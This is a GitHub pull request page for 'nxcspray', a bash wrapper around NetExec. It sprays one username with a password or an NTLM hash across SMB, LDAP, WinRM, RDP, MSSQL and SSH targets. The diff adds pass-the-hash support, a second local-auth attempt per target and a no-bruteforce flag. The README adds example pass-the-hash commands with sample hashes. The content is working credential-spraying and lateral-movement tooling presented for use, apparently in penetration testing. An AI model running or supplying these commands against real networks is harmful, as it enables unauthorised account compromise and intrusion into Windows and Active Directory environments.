Skip to content

added NTLM hash support #3

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
sidsherrill1 wants to merge 5 commits into
base: main
Choose a base branch
from
Open

added NTLM hash support #3

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
a4d7104
added NTLM hash support
sisherri-cisco Mar 23, 2026
e4500f3
Update installation and usage instructions in README
sidsherrill1 Mar 23, 2026
3389f82
add local auth check
sisherri-cisco Mar 26, 2026
735b5a6
fix local auth check
sisherri-cisco Mar 26, 2026
812a4fc
add no bruteforce option
sisherri-cisco Mar 30, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 9 additions & 2 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -6,14 +6,15 @@ Clone this repo or download the script directly.

Add the script to /usr/local/bin/ to execute it from anywhere on your machine, or use it in a local directory of your choice.
```
sudo mv ~/Downloads/nxcspray /usr/local/bin
git clone https://github.com/sidsherrill1/nxcspray.git && cd nxcspray
sudo mv nxcspray /usr/local/bin
chmod +x /usr/local/bin/nxcspray
```

# Usage
```
└─$ nxcspray -h
[-] Usage: nxcspray <protocols|all> <targets> -u <username> -p <password>
[-] Usage: /usr/local/bin/nxcspray <protocols|all> <targets> -u <username> (-p <password> | -H <ntlm_hash>)
```

Example Usage
Expand All @@ -29,3 +30,9 @@ nxcspray all 10.1.45.200 -u e.hills -p 'Il0vemyj0b2025!'
```
<img width="1315" height="365" alt="image" src="https://github.com/user-attachments/assets/65453924-98c5-44c1-975c-bfb40968ef88" />



```
nxcspray smb,ldap,winrm hosts.txt -u bob -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30a0e5adb2efe0ecd
nxcspray rdp 10.0.0.5 -u Administrator -H 5fbc3d5fec8206a30a0e5adb2efe0ecd
```
86 changes: 79 additions & 7 deletions nxcspray
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,41 +1,95 @@
#!/bin/bash

# Spray credentials across NetExec (nxc) protocols. Requires `nxc` on PATH
# (NetExec is commonly installed on Kali and other offensive-security distros).
#
# Usage:
# nxcspray <protocols|all> <targets> -u <username> -p <password>
# nxcspray <protocols|all> <targets> -u <username> -p <password> [-N|--no-bruteforce]
# nxcspray <protocols|all> <targets> -u <username> -H <lm:nt|nt_hash> [-N|--no-bruteforce]
#
# Use either -p (password) or -H (NTLM hash), not both.
#
# Optional: -N or --no-bruteforce appends nxc's --no-bruteforce to each run (see NetExec
# docs; commonly used with user/password files for one-to-one pairing instead of full combinatorics).
#
# Examples:
# nxcspray all 10.10.10.10 -u bob -p password
# nxcspray smb,ldap,winrm hosts.txt -u bob -p password
# nxcspray smb,ldap,winrm hosts.txt -u bob -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30a0e5adb2efe0ecd
# nxcspray rdp 10.0.0.5 -u Administrator -H 5fbc3d5fec8206a30a0e5adb2efe0ecd
# nxcspray smb 10.0.0.5 -u Administrator -p secret --no-bruteforce
#
# Each protocol/target is tried without nxc's --local-auth, then again with
# --local-auth where supported (ldap and ssh omit the second pass).

# ---- Argument Validation ----
if [ "$#" -lt 4 ]; then
echo "[-] Usage: $0 <protocols|all> <targets> -u <username> -p <password>"
echo "[-] Usage: $0 <protocols|all> <targets> -u <username> (-p <password> | -H <ntlm_hash>) [-N|--no-bruteforce]"
exit 1
fi

PROTOS_RAW="$1"
TARGETS_RAW="$2"
shift 2

NO_BRUTEFORCE=false
REMAINING=()
while [ $# -gt 0 ]; do
case "$1" in
--no-bruteforce)
NO_BRUTEFORCE=true
shift
;;
*)
REMAINING+=("$1")
shift
;;
esac
done
set -- "${REMAINING[@]}"

USER=""
PASS=""
HASH=""

while getopts "u:p:" opt; do
while getopts "u:p:H:N" opt; do
case $opt in
u) USER="$OPTARG" ;;
p) PASS="$OPTARG" ;;
H) HASH="$OPTARG" ;;
N) NO_BRUTEFORCE=true ;;
*)
echo "[-] Invalid flag"
exit 1
;;
esac
done

if [ -z "$USER" ] || [ -z "$PASS" ]; then
echo "[-] Missing required flags: -u <username> -p <password>"
EXTRA_NXC=()
if [ "$NO_BRUTEFORCE" = true ]; then
EXTRA_NXC+=(--no-bruteforce)
fi

if [ -z "$USER" ]; then
echo "[-] Missing required flag: -u <username>"
exit 1
fi

if [ -n "$PASS" ] && [ -n "$HASH" ]; then
echo "[-] Use only one of -p <password> or -H <ntlm_hash>, not both"
exit 1
fi

if [ -z "$PASS" ] && [ -z "$HASH" ]; then
echo "[-] Missing credentials: provide -p <password> or -H <ntlm_hash>"
exit 1
fi

if [ -n "$HASH" ]; then
AUTH_MODE="hash"
else
AUTH_MODE="password"
fi

# ---- Protocol Handling ----
if [ "$PROTOS_RAW" = "all" ]; then
PROTO_ARRAY=(smb ldap winrm rdp mssql ssh)
Expand All @@ -56,6 +110,24 @@ for PROTO in "${PROTO_ARRAY[@]}"; do

for TARGET in $TARGETS; do
echo " -> Target: $TARGET"
nxc "$PROTO" "$TARGET" -u "$USER" -p "$PASS"

if [ "$AUTH_MODE" = "hash" ] && [ "$PROTO" = "ssh" ]; then
echo " [!] Skipping: ssh does not use NTLM hash authentication"
continue
fi

run_nxc() {
if [ "$AUTH_MODE" = "password" ]; then
nxc "$PROTO" "$TARGET" -u "$USER" -p "$PASS" "${EXTRA_NXC[@]}" "$@"
else
nxc "$PROTO" "$TARGET" -u "$USER" -H "$HASH" "${EXTRA_NXC[@]}" "$@"
fi
}

run_nxc
if [ "$PROTO" != "ldap" ] && [ "$PROTO" != "ssh" ]; then
echo " -> (local-auth)"
run_nxc --local-auth
fi
done
done